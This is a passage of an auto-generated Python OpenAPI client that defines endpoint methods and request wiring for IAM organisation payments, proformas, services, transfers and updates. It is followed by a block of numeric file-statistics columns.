    },
    params_map={
        'all': ['organisation_id', 'payment_id'],
        'required': ['organisation_id', 'payment_id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'payment_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'payment_id': 'paymentId',
        },
        'location_map': {
            'organisation_id': 'path',
            'payment_id': 'path',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_payment_get,
)
def __iam_organisation_payment_list(
        self,
        organisation_id,
        **kwargs
):
    """List iam/organisation.payment  # noqa: E501

    List iam/organisation.payment  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_payment_list(organisation_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        [Payment]
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    return self.call_with_http_info(**kwargs)
self.iam_organisation_payment_list = _Endpoint(
    settings={
        'response_type': ([Payment],),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/payment',
        'operation_id': 'iam_organisation_payment_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id'],
        'required': ['organisation_id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'organisation_id': (str,)},
        'attribute_map': {'organisation_id': 'organisationId'},
        'location_map': {'organisation_id': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_payment_list,
)
def __iam_organisation_proforma_create(
        self,
        organisation_id,
        iam_organisation_proforma_create,
        **kwargs
):
    """Create iam/organisation.proforma  # noqa: E501

    Create iam/organisation.proforma  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_proforma_create(organisation_id, iam_organisation_proforma_create, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        iam_organisation_proforma_create (IamOrganisationProformaCreate):

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Proforma
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['iam_organisation_proforma_create'] = iam_organisation_proforma_create
    return self.call_with_http_info(**kwargs)
self.iam_organisation_proforma_create = _Endpoint(
    settings={
        'response_type': (Proforma,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/proforma',
        'operation_id': 'iam_organisation_proforma_create',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'iam_organisation_proforma_create'],
        'required': ['organisation_id', 'iam_organisation_proforma_create'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'iam_organisation_proforma_create': (IamOrganisationProformaCreate,),
        },
        'attribute_map': {'organisation_id': 'organisationId'},
        'location_map': {
            'organisation_id': 'path',
            'iam_organisation_proforma_create': 'body',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json'],
    },
    api_client=api_client,
    callable=__iam_organisation_proforma_create,
)
def __iam_organisation_proforma_download(
        self,
        organisation_id,
        proforma_id,
        **kwargs
):
    """Download iam/organisation.proforma  # noqa: E501

    action download  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_proforma_download(organisation_id, proforma_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        proforma_id (str): proformaId

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        file_type
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['proforma_id'] = proforma_id
    return self.call_with_http_info(**kwargs)
self.iam_organisation_proforma_download = _Endpoint(
    settings={
        'response_type': (file_type,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/proforma/{proformaId}/actions/download',
        'operation_id': 'iam_organisation_proforma_download',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'proforma_id'],
        'required': ['organisation_id', 'proforma_id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'proforma_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'proforma_id': 'proformaId',
        },
        'location_map': {
            'organisation_id': 'path',
            'proforma_id': 'path',
        },
        'collection_format_map': {},
    },
    headers_map={
        # PDF is the primary payload; JSON covers error responses.
        'accept': [
            'application/pdf',
            'application/json'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_proforma_download,
)
def __iam_organisation_proforma_get(
        self,
        organisation_id,
        proforma_id,
        **kwargs
):
    """Get iam/organisation.proforma  # noqa: E501

    Get iam/organisation.proforma  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_proforma_get(organisation_id, proforma_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        proforma_id (str): proformaId

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Proforma
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['proforma_id'] = proforma_id
    return self.call_with_http_info(**kwargs)
self.iam_organisation_proforma_get = _Endpoint(
    settings={
        'response_type': (Proforma,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/proforma/{proformaId}',
        'operation_id': 'iam_organisation_proforma_get',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'proforma_id'],
        'required': ['organisation_id', 'proforma_id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'proforma_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'proforma_id': 'proformaId',
        },
        'location_map': {
            'organisation_id': 'path',
            'proforma_id': 'path',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_proforma_get,
)
# Auto-generated by OpenAPI Generator -- do not edit by hand.
def __iam_organisation_proforma_list(
    self,
    organisation_id,
    **kwargs
):
    """List iam/organisation.proforma  # noqa: E501

    List iam/organisation.proforma  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_proforma_list(organisation_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        [Proforma]
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the framework-level defaults, then hand off to the shared
    # request machinery on the _Endpoint instance.
    kwargs['async_req'] = kwargs.get('async_req', False)
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    kwargs['_preload_content'] = kwargs.get('_preload_content', True)
    kwargs['_request_timeout'] = kwargs.get('_request_timeout', None)
    kwargs['_check_input_type'] = kwargs.get('_check_input_type', True)
    kwargs['_check_return_type'] = kwargs.get('_check_return_type', True)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['organisation_id'] = organisation_id
    return self.call_with_http_info(**kwargs)

# Endpoint wiring for the callable above (HTTP metadata + parameter maps).
self.iam_organisation_proforma_list = _Endpoint(
    settings={
        'response_type': ([Proforma],),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/proforma',
        'operation_id': 'iam_organisation_proforma_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id',],
        'required': ['organisation_id',],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
        },
        'location_map': {
            'organisation_id': 'path',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_proforma_list
)
# Auto-generated by OpenAPI Generator -- do not edit by hand.
def __iam_organisation_service_get(
    self,
    organisation_id,
    service_id,
    **kwargs
):
    """Get iam/organisation.service  # noqa: E501

    Get iam/organisation.service  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_service_get(organisation_id, service_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        service_id (str): serviceId

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        ResourceService
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the framework-level defaults, then hand off to the shared
    # request machinery on the _Endpoint instance.
    kwargs['async_req'] = kwargs.get('async_req', False)
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    kwargs['_preload_content'] = kwargs.get('_preload_content', True)
    kwargs['_request_timeout'] = kwargs.get('_request_timeout', None)
    kwargs['_check_input_type'] = kwargs.get('_check_input_type', True)
    kwargs['_check_return_type'] = kwargs.get('_check_return_type', True)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['service_id'] = service_id
    return self.call_with_http_info(**kwargs)

# Endpoint wiring for the callable above (HTTP metadata + parameter maps).
self.iam_organisation_service_get = _Endpoint(
    settings={
        'response_type': (ResourceService,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/service/{serviceId}',
        'operation_id': 'iam_organisation_service_get',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'service_id',],
        'required': ['organisation_id', 'service_id',],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'service_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'service_id': 'serviceId',
        },
        'location_map': {
            'organisation_id': 'path',
            'service_id': 'path',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_service_get
)
# Auto-generated by OpenAPI Generator -- do not edit by hand.
def __iam_organisation_service_list(
    self,
    organisation_id,
    **kwargs
):
    """List iam/organisation.service  # noqa: E501

    List iam/organisation.service  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_service_list(organisation_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        [ResourceService]
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the framework-level defaults, then hand off to the shared
    # request machinery on the _Endpoint instance.
    kwargs['async_req'] = kwargs.get('async_req', False)
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    kwargs['_preload_content'] = kwargs.get('_preload_content', True)
    kwargs['_request_timeout'] = kwargs.get('_request_timeout', None)
    kwargs['_check_input_type'] = kwargs.get('_check_input_type', True)
    kwargs['_check_return_type'] = kwargs.get('_check_return_type', True)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['organisation_id'] = organisation_id
    return self.call_with_http_info(**kwargs)

# Endpoint wiring for the callable above (HTTP metadata + parameter maps).
self.iam_organisation_service_list = _Endpoint(
    settings={
        'response_type': ([ResourceService],),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/service',
        'operation_id': 'iam_organisation_service_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id',],
        'required': ['organisation_id',],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
        },
        'location_map': {
            'organisation_id': 'path',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_service_list
)
# Auto-generated by OpenAPI Generator -- do not edit by hand.
def __iam_organisation_transfer_accept(
    self,
    organisation_id,
    transfer_id,
    iam_organisation_transfer_accept,
    **kwargs
):
    """Accept iam/organisation.transfer  # noqa: E501

    action accept  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_transfer_accept(organisation_id, transfer_id, iam_organisation_transfer_accept, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        transfer_id (str): transferId
        iam_organisation_transfer_accept (IamOrganisationTransferAccept):

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Transfer
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the framework-level defaults, then hand off to the shared
    # request machinery on the _Endpoint instance.
    kwargs['async_req'] = kwargs.get('async_req', False)
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    kwargs['_preload_content'] = kwargs.get('_preload_content', True)
    kwargs['_request_timeout'] = kwargs.get('_request_timeout', None)
    kwargs['_check_input_type'] = kwargs.get('_check_input_type', True)
    kwargs['_check_return_type'] = kwargs.get('_check_return_type', True)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['transfer_id'] = transfer_id
    kwargs['iam_organisation_transfer_accept'] = iam_organisation_transfer_accept
    return self.call_with_http_info(**kwargs)

# Endpoint wiring for the callable above. Note the body parameter appears
# in location_map ('body') but not in attribute_map (no wire-name rename).
self.iam_organisation_transfer_accept = _Endpoint(
    settings={
        'response_type': (Transfer,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/transfer/{transferId}/actions/accept',
        'operation_id': 'iam_organisation_transfer_accept',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'transfer_id', 'iam_organisation_transfer_accept',],
        'required': ['organisation_id', 'transfer_id', 'iam_organisation_transfer_accept',],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'transfer_id': (str,),
            'iam_organisation_transfer_accept': (IamOrganisationTransferAccept,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'transfer_id': 'transferId',
        },
        'location_map': {
            'organisation_id': 'path',
            'transfer_id': 'path',
            'iam_organisation_transfer_accept': 'body',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json']
    },
    api_client=api_client,
    callable=__iam_organisation_transfer_accept
)
# Auto-generated by OpenAPI Generator -- do not edit by hand.
def __iam_organisation_transfer_get(
    self,
    organisation_id,
    transfer_id,
    **kwargs
):
    """Get iam/organisation.transfer  # noqa: E501

    Get iam/organisation.transfer  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_transfer_get(organisation_id, transfer_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        transfer_id (str): transferId

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Transfer
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the framework-level defaults, then hand off to the shared
    # request machinery on the _Endpoint instance.
    kwargs['async_req'] = kwargs.get('async_req', False)
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    kwargs['_preload_content'] = kwargs.get('_preload_content', True)
    kwargs['_request_timeout'] = kwargs.get('_request_timeout', None)
    kwargs['_check_input_type'] = kwargs.get('_check_input_type', True)
    kwargs['_check_return_type'] = kwargs.get('_check_return_type', True)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['transfer_id'] = transfer_id
    return self.call_with_http_info(**kwargs)

# Endpoint wiring for the callable above (HTTP metadata + parameter maps).
self.iam_organisation_transfer_get = _Endpoint(
    settings={
        'response_type': (Transfer,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/transfer/{transferId}',
        'operation_id': 'iam_organisation_transfer_get',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'transfer_id',],
        'required': ['organisation_id', 'transfer_id',],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'transfer_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'transfer_id': 'transferId',
        },
        'location_map': {
            'organisation_id': 'path',
            'transfer_id': 'path',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_transfer_get
)
# Auto-generated by OpenAPI Generator -- do not edit by hand.
def __iam_organisation_transfer_list(
    self,
    organisation_id,
    **kwargs
):
    """List iam/organisation.transfer  # noqa: E501

    List iam/organisation.transfer  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_transfer_list(organisation_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        [Transfer]
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the framework-level defaults, then hand off to the shared
    # request machinery on the _Endpoint instance.
    kwargs['async_req'] = kwargs.get('async_req', False)
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    kwargs['_preload_content'] = kwargs.get('_preload_content', True)
    kwargs['_request_timeout'] = kwargs.get('_request_timeout', None)
    kwargs['_check_input_type'] = kwargs.get('_check_input_type', True)
    kwargs['_check_return_type'] = kwargs.get('_check_return_type', True)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['organisation_id'] = organisation_id
    return self.call_with_http_info(**kwargs)

# Endpoint wiring for the callable above (HTTP metadata + parameter maps).
self.iam_organisation_transfer_list = _Endpoint(
    settings={
        'response_type': ([Transfer],),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/transfer',
        'operation_id': 'iam_organisation_transfer_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id',],
        'required': ['organisation_id',],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
        },
        'location_map': {
            'organisation_id': 'path',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_transfer_list
)
# Auto-generated by OpenAPI Generator -- do not edit by hand.
def __iam_organisation_update(
    self,
    organisation_id,
    iam_organisation_update,
    **kwargs
):
    """Update iam/organisation  # noqa: E501

    Returns modified organisation  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_update(organisation_id, iam_organisation_update, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        iam_organisation_update (IamOrganisationUpdate):

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Organisation
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the framework-level defaults, then hand off to the shared
    # request machinery on the _Endpoint instance.
    kwargs['async_req'] = kwargs.get('async_req', False)
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    kwargs['_preload_content'] = kwargs.get('_preload_content', True)
    kwargs['_request_timeout'] = kwargs.get('_request_timeout', None)
    kwargs['_check_input_type'] = kwargs.get('_check_input_type', True)
    kwargs['_check_return_type'] = kwargs.get('_check_return_type', True)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['iam_organisation_update'] = iam_organisation_update
    return self.call_with_http_info(**kwargs)

# Endpoint wiring for the callable above. The body parameter appears in
# location_map ('body') but not in attribute_map (no wire-name rename).
self.iam_organisation_update = _Endpoint(
    settings={
        'response_type': (Organisation,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}',
        'operation_id': 'iam_organisation_update',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'iam_organisation_update',],
        'required': ['organisation_id', 'iam_organisation_update',],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'iam_organisation_update': (IamOrganisationUpdate,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
        },
        'location_map': {
            'organisation_id': 'path',
            'iam_organisation_update': 'body',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json']
    },
    api_client=api_client,
    callable=__iam_organisation_update
)
| 37.637131
| 147
| 0.468465
| 12,407
| 151,640
| 5.442331
| 0.018619
| 0.06614
| 0.023873
| 0.024792
| 0.934482
| 0.90267
| 0.877612
| 0.874843
| 0.859189
| 0.855664
| 0
| 0.0032
| 0.451754
| 151,640
| 4,028
| 148
| 37.646475
| 0.809
| 0.314614
| 0
| 0.686883
| 1
| 0
| 0.243716
| 0.059513
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011692
| false
| 0
| 0.008038
| 0
| 0.031421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
